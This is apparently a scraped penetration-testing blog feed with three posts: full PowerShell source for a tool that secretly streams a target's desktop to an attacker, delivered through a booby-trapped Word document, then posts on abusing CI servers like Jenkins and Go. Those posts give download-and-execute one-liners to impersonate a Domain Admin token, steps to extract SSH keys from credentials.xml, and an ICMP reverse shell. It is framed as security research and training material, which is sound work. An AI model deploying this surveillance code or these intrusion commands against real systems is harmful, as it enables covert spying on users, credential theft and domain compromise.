Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com8tag:blogger.com,1999:blog-8135211063584500909.post-20781599817068577052015-12-17T22:22:00.003+05:302018-01-14T22:48:14.777+05:30Stream a target's Desktop using MJPEG and PowerShell<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you <b>Show-TargetScreen.ps1</b>. This script can stream a target's desktop in real time and the stream could be seen in browsers which support MJPEG (Firefox).<br />
<br />
<a href="https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1">Show-TargetScreen is available in the Gather category of Nishang</a>. The current source code looks like this:</div>
<div style="text-align: justify;">
<br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: white; color: black;">function Show-TargetScreen
{
<#
.SYNOPSIS
Nishang script which can be used for streaming a target's desktop using MJPEG.
.DESCRIPTION
This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening
on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox)
should then be pointed to the local port to see the remote desktop.
The script should be used with Client Side Attacks.
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443
Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"
Above shows an example using the script in a client side attack.
.EXAMPLE
PS > Show-TargetScreen -Bind -Port 1234
Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop.
.LINK
http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
while ($true)
{
try
{
Add-Type -AssemblyName System.Windows.Forms
[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream
#Connect back if the reverse switch is used.
if ($Reverse)
{
$socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$socket.Connect($IPAddress,$Port)
Write-Verbose "Connected to $IPAddress"
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
#Start a listener
$endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port)
$server = new-object System.Net.Sockets.TcpListener $endpoint
$server.Start()
$buffer = New-Object byte[] 1024
$socket = $server.AcceptSocket()
}
#https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/
function SendResponse($sock, $string)
{
if ($sock.Connected)
{
$bytesSent = $sock.Send(
$string)
if ( $bytesSent -eq -1 )
{
Write-Output "Send failed to " + $sock.RemoteEndPoint
}
}
}
function SendStrResponse($sock, $string)
{
if ($sock.Connected)
{
$bytesSent = $sock.Send(
[text.Encoding]::Ascii.GetBytes($string))
if ( $bytesSent -eq -1 )
{
Write-Output ("Send failed to " + $sock.RemoteEndPoint)
}
}
}
#Create the header for MJPEG stream
function SendHeader(
[net.sockets.socket] $sock,
$length,
$statusCode = "200 OK",
$mimeHeader="text/html",
$httpVersion="HTTP/1.1"
)
{
$response = "HTTP/1.1 $statusCode`r`n" +
"Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n"
SendStrResponse $sock $response
Write-Verbose "Header sent to $IPAddress"
}
#Send the header
SendHeader $socket
while ($True)
{
$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)
$g = [System.Drawing.Graphics]::FromImage($b)
$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
$g.Dispose()
$MemoryStream.SetLength(0)
$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg))
$b.Dispose()
$length = $MemoryStream.Length
[byte[]] $Bytes = $MemoryStream.ToArray()
#Set the boundary for the multi-part request
$str = "`n`n--boundary`n" +
"Content-Type: image/jpeg`n" +
"Content-Length: $length`n`n"
#Send Requests
SendStrResponse $socket $str
SendResponse $socket $Bytes
}
$MemoryStream.Close()
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
}
</textarea></pre>
<br /></div>
<div style="text-align: justify;">
Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000: </div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Note that if on a *nix machine, netcat could be used as well. <br />
<br />
Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">client side attack</a>. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPSVCqg4X1vqXoDf9emAUNxEJWmCMndPVoLxa4Rl1uPm2uJ-O3o5optK9bzSHKCpL0cuevpWGGE3jx8JrBcHokJUumkJ67uyzA_8RcYufyEbGorq2Vty-kS4Ad6VKADYJylRTyRwL17Yg/s1600/powercat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPSVCqg4X1vqXoDf9emAUNxEJWmCMndPVoLxa4Rl1uPm2uJ-O3o5optK9bzSHKCpL0cuevpWGGE3jx8JrBcHokJUumkJ67uyzA_8RcYufyEbGorq2Vty-kS4Ad6VKADYJylRTyRwL17Yg/s400/powercat.png" width="400" /></a></div>
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop. </div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4ZM8YLPgFw94I_cn3hWwmyGFoFZO-Ud7nVIePnWJpVP0R-m-YmMAWT4EAZjWkS5RtPLrYKLsnQ5nZv9eH0JsX-OuiUU8QgzLV6-G-boOJaseClOTdC5eLHGLYD1UgGA9px6sTQdc29s/s1600/Show-TargetScreen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4ZM8YLPgFw94I_cn3hWwmyGFoFZO-Ud7nVIePnWJpVP0R-m-YmMAWT4EAZjWkS5RtPLrYKLsnQ5nZv9eH0JsX-OuiUU8QgzLV6-G-boOJaseClOTdC5eLHGLYD1UgGA9px6sTQdc29s/s320/Show-TargetScreen.png" width="320" /></a></div>
Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results.<br />
<br />
Couple of things which I would like to improve in future:<br />
- Proxy support<br />
- HTTPS Connection.<br />
<br />
Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome. </div>
<div style="text-align: justify;">
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com10tag:blogger.com,1999:blog-8135211063584500909.post-76763274397722835692015-12-03T20:03:00.000+05:302018-01-14T22:48:15.200+05:30Week of Continuous Intrusion Tools - Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 4 of Week of Continuous Intrusion tools. We are discussing security of Continuous Integration (CI) tools in this series of blog posts. </div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation</div>
<div style="text-align: justify;">
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)</div>
<br />
<div style="text-align: justify;">
Day 4 is dedicated to Common abuse set, Lateral movement and Post exploitation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the past three days, we discussed how different attacks can be executed against Jenkins (and Hudson), TeamCity, (very briefly) CruiseControl and Go. Some of the readers might have noticed that many attacks looked common and were result of mis-configurations, lack of common security controls and/ or abuse of features. Lets pick things common to the tools we discussed and make a Common Abuse Set out of them.</div>
<div style="text-align: justify;">
</div>
<br />
<br />
<h3 style="text-align: left;">
Common Abuse Set</h3>
From the previous posts, the Common Abuse Set for the CI Tools we saw turns out to be:<br />
<ul style="text-align: left;">
<li>Missing basic and common security controls </li>
<ul>
<li>Missing protections against brute force attempts.</li>
<li> Insecure storage of SSH keys and credentials.</li>
<li>Higher privileges on Windows machines for both master and slaves.</li>
</ul>
<li> The feature of Command Execution at the Operating System level.</li>
<li>Mis-Configuration</li>
<ul>
<li>Agent on Master</li>
<li>Read permissions to everyone on public instances.</li>
<li>Use of HTTP for login</li>
<li>Not enabling encrypted communication between master and slaves.</li>
</ul>
<li>Poor Security practices by users</li>
<ul>
<li>Passwords in build parameters.</li>
<li>Use of username as password specially in case of users local to a CI tool. </li>
</ul>
<li>Many public instances of these tools </li>
<ul></ul>
</ul>
<div style="text-align: justify;">
Lets have a quick look at some of them.</div>
<br />
<h3 style="text-align: justify;">
(Missing) Security Controls</h3>
<br />
<div style="text-align: justify;">
<b>1. Authentication</b></div>
<br />
<div style="text-align: justify;">
CI tools were found to missing even the most basic security control like protection against Brute Force attacks. In fact, Jenkins and Go have no authentication at all in the default installation. If you are following me this blog for past three days, you will find that it is trivial to find instances of these tools on the internet running with the default configurations. This highlights the state of security for these tools.Not many enterprise tools miss these basic controls. </div>
<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;border-color:#ccc;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#ccc;color:#333;background-color:#fff;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#ccc;color:#333;background-color:#f0f0f0;}
.tg .tg-baqh{text-align:center;vertical-align:top}
.tg .tg-yw4l{vertical-align:top}
</style><br />
<table class="tg"><tbody>
<tr> <th class="tg-baqh">CI Tool</th> <th class="tg-baqh">Jenkins/Hudson</th> <th class="tg-baqh">Teamcity</th> <th class="tg-baqh">Go</th> </tr>
<tr> <td class="tg-yw4l">Authentication<br />
- Login attempts<br />
-Captcha<br />
-Password Policy</td> <td class="tg-yw4l">- No Authentication by Default<br />
- No protection against Brute Force attacks in the recommended Matrix based Authorization<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> <td class="tg-yw4l">- Guest User can be enabled<br />
- Registration enabled by default<br />
- Wait after five failed login attempts in one minute<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> <td class="tg-yw4l">- No Authentication by Default<br />
- No protection against Brute Force attacks.<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> </tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<br />
<span style="font-weight: normal;"><b>2. Insecure Storage of Credentials/SSH Keys </b></span><br />
All the tested CI tools store all or some credentials and SSH Keys in insecure format. All of them store SSH Keys in clear text and encrypted credentials from Jenkins could be retrieved in clear text. Its amazing that these tools still do this.<br />
<br />
<b>3. Privileges </b></div>
<div style="text-align: justify;">
All the tested CI tools run with either SYSTEM or admin privileges on Windows. This holds true for both masters and slaves/agents. This makes the command execution access much more fruitful from an attacker's view.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Command Execution </h3>
<div style="text-align: justify;">
The feature of CI tools which allow execution of Operating System commands by adding build steps is what makes them special. In most of the widely used enterprise tools, the ability to execute OS commands is uncommon. This ability makes CI tools a useful target. Add to it the capability of distributed builds and by compromising the master an attacker can execute commands on large number of slaves.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Mis-configuration</h3>
<div style="text-align: justify;">
Agent on master</div>
<div style="text-align: justify;">
Documentation of all the tested CI tools do not recommend having a build executor or agent on master. Still, Jenkins install it by default and TeamCity provides it in the same installation package. Only Go needs a user to download a separate installation for agent on master. We have already seen that an agent on master makes all security useless.</div>
<br />
<h3 style="text-align: left;">
Lateral Movement and Post Exploitation</h3>
<div style="text-align: justify;">
The kind of access we have with CI tools makes it possible to do much more interesting stuff in a network other than just a reverse shell. </div>
<br />
<h4 style="text-align: left;">
Domain Admin</h4>
<br />
<div style="text-align: justify;">
Because CI Tools we discussed support distributed builds, in an enterprise environment it is quite possible to spot machines (master and/or slave) where a credentials of a high privileged user like a Common Local Admin or a Domain Admin are available. Note that even if master runs on *nix, there are almost always slaves running on Windows. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Lets assume this scenario. We have access to Jenkins or any other tool and the ability to configure builds on many slaves and one of the slaves has a process running as Domain Administrator. We can use PowerShell (and other tools as well) to enumerate and reuse the token and escalate to Domain Admin. We can use <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1">Invoke-TokenManipulation from PowerSploit</a> for enumeration and impersonation.We can use the below command in a Jenkins build step for downloading and executing the script in memory:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell -c "iex(New-Object Net.WebClient).DownloadString('http://[IPAddress]/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation"</textarea></pre>
<div style="text-align: justify;">
Since the Jenkins runs as SYSTEM, this will list all the available tokens.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RmlypvXqcYeDX_d-7AsjUkuo-wVHbE7QZb5lEXqGkSpTYdNh4gPt8c_ZU9Q03VWZo9OyEoG5hKbzu8D3_cbQoX1rKTBwtucPr4yPrXB5y7Vjf6g0n9NtR5fV6YhXqZRmzbz6CX5xl9E/s1600/Domain_Admin_Token.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RmlypvXqcYeDX_d-7AsjUkuo-wVHbE7QZb5lEXqGkSpTYdNh4gPt8c_ZU9Q03VWZo9OyEoG5hKbzu8D3_cbQoX1rKTBwtucPr4yPrXB5y7Vjf6g0n9NtR5fV6YhXqZRmzbz6CX5xl9E/s400/Domain_Admin_Token.png" width="400" /></a></div>
Note that there is a token for the Domain Administrator. Now we can use the below command in Jenkins build step to run Invoke-TokenManipulation in memory, impersonate the token of Domain Administrator and run the Get-Process cmdlet on the Domain Controller.</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.230.1/Invoke-TokenManipulation.ps1');Get-Process -Id 364 | Invoke-TokenManipulation -ImpersonateUser;Get-Process -Computername pfptlab-dc"</textarea></pre>
<div style="text-align: justify;">
And the result looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8WqYrD92DEOAtnTu3LuVu9HdwiksvIlBkV2qisYHmmPX4ykiNDhtv8geNWxJqDfoqMAStBv9_NLsas60BL-lN4KEuamcUZYhxv2BklG7kHTeEkoqbLU8eIy7iIiQ1GxrcGvsRnVTmSQ/s1600/Domain_Admin_Success.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8WqYrD92DEOAtnTu3LuVu9HdwiksvIlBkV2qisYHmmPX4ykiNDhtv8geNWxJqDfoqMAStBv9_NLsas60BL-lN4KEuamcUZYhxv2BklG7kHTeEkoqbLU8eIy7iIiQ1GxrcGvsRnVTmSQ/s400/Domain_Admin_Success.png" width="400" /></a></div>
Awesome! We just executed command on the domain controller as a domain admin. Too easy? Try it in an environment where you are authorized to do so and get pleasantly surprised ;)</div>
<div style="text-align: justify;">
Please note that we assumed that the enumeration of name of Domain Admins and the Domain Controller was done already (which is trivial). Also, even if we cannot find a privileged user on any of the slaves, we can always try querying other machines in the network from the slave machines we have access to ;) Note that while querying other machines in a domain we must impersonate a domain user on the slave machine to be able to interact with Active Directory. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h4>
Linux machines</h4>
</div>
<div style="text-align: justify;">
While testing the CI tools, we regularly got hands on SSH keys. These SSH keys could be used to access version control and Linux hosts.<br />
<br />
Lets assume this scenario. We got access to a Jenkins instance. We can retrieve and use SSH key to login to a Linux machine (root or normal user depending upon the keys). As we saw in Day 1, SSH keys in Jenkins are stored in clear either in $JENKINS_HOME or credentials.xml. We can also retrieve the passphrase. More than often, we will be able to login to a large number of slaves.<br />
<br />
Lets read credentials.xml and see if there are any private SSH keys there.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXpESgwYbVkbV8cGEGm0DXD3NnM793kLXGt55PLyi6qIGSTkOYq1MumUp3GvDX365Xgua4HEZM4HAXB8sZJZv_ZN-JaoOc3wNaf5LorDus0qhl09N6LQB06rYBdVMU8YWYPAE8E4uOVc/s1600/SSH_Keys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXpESgwYbVkbV8cGEGm0DXD3NnM793kLXGt55PLyi6qIGSTkOYq1MumUp3GvDX365Xgua4HEZM4HAXB8sZJZv_ZN-JaoOc3wNaf5LorDus0qhl09N6LQB06rYBdVMU8YWYPAE8E4uOVc/s400/SSH_Keys.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
Seems like there is a private key for a user named "ubuntuadmin" which has passphrase (encrypted). We can retreive the pass phrase using the method discussed in Day 1. Now, the only missing part is on which machine the key could be used. For that, either we need to see build logs to find any logs regarding this key use or simply try it on all the Linux machines available.<br />
<br />
Also, to use the key with Putty, we need to convert it in putty format using puttygen.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJi_9rUbwIyOJaK7XNF-0S-UQlp0NQsRAle35UeuR7E3cS3NCP6K6XPF_P7XN1FOo_NHsw28Ga4V07cVUSFVViWq-VsjDW2j1SybgIBxgrRRqmG7Ub7L7soSiEAiESgcl3u1UUMkbWJk/s1600/SSH_Keys_PuttyGen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJi_9rUbwIyOJaK7XNF-0S-UQlp0NQsRAle35UeuR7E3cS3NCP6K6XPF_P7XN1FOo_NHsw28Ga4V07cVUSFVViWq-VsjDW2j1SybgIBxgrRRqmG7Ub7L7soSiEAiESgcl3u1UUMkbWJk/s400/SSH_Keys_PuttyGen.png" width="400" /></a></div>
And then:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8Q80A8vZWQcvmkuQGR0dEjuGUs5JZSmrMd0lH8eY-ueZ78CmFUuLpPEuQAoR4yKnL6WX-xJt_ARZ4DKgVUm16WjHC17N2vcTC_XgrgV8fktUAeMXEXU5spriKoV09EtDAnm1G8rh0iU/s1600/SSH_Keys_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8Q80A8vZWQcvmkuQGR0dEjuGUs5JZSmrMd0lH8eY-ueZ78CmFUuLpPEuQAoR4yKnL6WX-xJt_ARZ4DKgVUm16WjHC17N2vcTC_XgrgV8fktUAeMXEXU5spriKoV09EtDAnm1G8rh0iU/s400/SSH_Keys_login.png" width="400" /></a></div>
Neat! It just depends on the kind of confugration and usage of CI Tools in the target network. Source code repositories, version control systems and databases are also often accessible after compromising a CI tool.<br />
<br />
<h4>
Video Demonstration</h4>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/gdD02PYTJvg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/gdD02PYTJvg?feature=player_embedded" width="320"></iframe></div>
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br />
To support my research, join me for a two days training "<b>PowerShell for Penetration Testers</b>" at:<br />
<br /></div>
<b>BlackHat, Asia (March 29-30th, 2016) </b>- <a href="https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html">https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html</a><br />
<br />
<b>HITB, Amsterdam (May 24-25th, 2016) </b>- <a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a> </div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-89589393275762410872015-12-02T20:15:00.000+05:302018-01-14T22:48:15.299+05:30Week of Continuous Intrusion tools : Day 3 - Go and CruiseControl<div dir="ltr" style="text-align: left;" trbidi="on">
Welcome to the Day 3 of the Week of Continuous Intrusion Tools. We are having a look at the attack surface and abuse of Continuous Integration (CI) tools.<br />
<br />
To read posts of other days refer the table below:<br />
<br />
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity(<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl</div>
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)<br />
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)<br />
<div style="text-align: justify;">
<br />
Day 3 is dedicated to Go. Go is an open source CI Tool. It is available <a href="http://www.go.cd/download/">here</a>. Like previously discussed CI tools, Go supports distributed builds. That is, getting access to a Go Server provides access to not only the agents but to good amount of source code and much more!<br />
<br />
Some of the security issues to be noticed with Go:<br />
<ul>
<li>No authentication in the default installation.</li>
<li>No protection against brute force attacks (repeated login attempts).</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs with SYSTEM or high privilege user on Windows (most configs settle with an admin account). </li>
</ul>
Unfortunately, there are not many public instances of Go to be able to comment on the information leaked by them (see the Google Dorks section). Almost all the Go servers I did a pen test on were internal ones with regularly having no authentication at all.<br />
<br />
To be able to do something interesting at the Operating System level we must have the Pipeline Group Administrator privileges (which is a non admin privilege). I was unable to find a way to enumerate users so some OSINT has to be used to locate developers, source code management teams and build support teams in the target enterprise (doing a ruthless Brute Force may be useless). I am not going to cover that in this post. We have to make an assumption of getting access to a Pipeline Group Administrator user. <br />
<br />
<h4>
Executing Commands</h4>
Having the ability to add/edit jobs in a Pipeline, once again, we can execute commands on the OS level. We must configure a job which runs custom commands. <a href="http://support.thoughtworks.com/entries/22873043-go-s-custom-command">See this documentation.</a><a href="http://support.thoughtworks.com/entries/22873043-go-s-custom-command"></a><a href="https://www.blogger.com/null"></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6pTe00-JPdblG3vb7G3kWaPzPT3j-RRFr7zbOKmeFGDU9u5aZRfRhxmeu3MLwnR_N8sw04lkTlpkLdv0kFyFSzlSSPEAb4Wql6fpLrOQCWcXkntWAX7oSjpiyKCAlppRsgw345G7WlhA/s1600/Go_cmd_exec_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6pTe00-JPdblG3vb7G3kWaPzPT3j-RRFr7zbOKmeFGDU9u5aZRfRhxmeu3MLwnR_N8sw04lkTlpkLdv0kFyFSzlSSPEAb4Wql6fpLrOQCWcXkntWAX7oSjpiyKCAlppRsgw345G7WlhA/s400/Go_cmd_exec_command.png" width="400" /></a></div>
And this is how the output looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6QtDdPw3E47wkNXg7ms2JXg_SGmGBrUlAyCnB1Ckstx-KWPhlvXw3OdGUMFtB7qPLNw_nRAfY6ruFJ1kq34g1an7lKpm4feanG5kgRd7r8A5dQqD2vvbLAHigd3JyNxBlZmUkPMdbzE/s1600/Go_cmd_exec_console.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6QtDdPw3E47wkNXg7ms2JXg_SGmGBrUlAyCnB1Ckstx-KWPhlvXw3OdGUMFtB7qPLNw_nRAfY6ruFJ1kq34g1an7lKpm4feanG5kgRd7r8A5dQqD2vvbLAHigd3JyNxBlZmUkPMdbzE/s400/Go_cmd_exec_console.png" width="400" /></a></div>
Nice! SYSTEM privileges yet again.<br />
<br />
Now, lets see how we can use one very useful PowerShell shell to get a reverse connect. Though Go may not be one of the best tools to show this demo due to the lack of its public instance, lets use only ICMP communication to get a reverse shell. We will use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1">Invoke-PowerShellIcmp from Nishang</a>. This reverse shell communicates completely over ICMP and needs a listener on Linux from the <a href="https://github.com/inquisb/icmpsh">icmpsh suite</a>. See my earlier blog post detailing its use <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html">here</a>. After setting up the listener, we will modify Invoke-PowerShellIcmp to remove help contents and make the function call from the script itself, now we can use Invoke-Encode from Nishang to compress and base64 encode it. Now, it could be used in the custom command as below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGE0xg8LrhGUmp2DCW8MbLdVBvyEwnhOjFt5YXYFtbkMTtfDI3qWB5mkktCfP5i6Od5LLLZIgRKkfvZIob66NH1sJciptp8VM7PIv-8s51CK7HRwGoQ1lW2OL5xREqDHBMgHOXUhGyH6Y/s1600/Go_Reverse_Shell_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGE0xg8LrhGUmp2DCW8MbLdVBvyEwnhOjFt5YXYFtbkMTtfDI3qWB5mkktCfP5i6Od5LLLZIgRKkfvZIob66NH1sJciptp8VM7PIv-8s51CK7HRwGoQ1lW2OL5xREqDHBMgHOXUhGyH6Y/s400/Go_Reverse_Shell_command.png" width="400" /></a></div>
<br />
and on the listener we can see:<br />
<div class="separator" style="clear: both; text-align: center;">
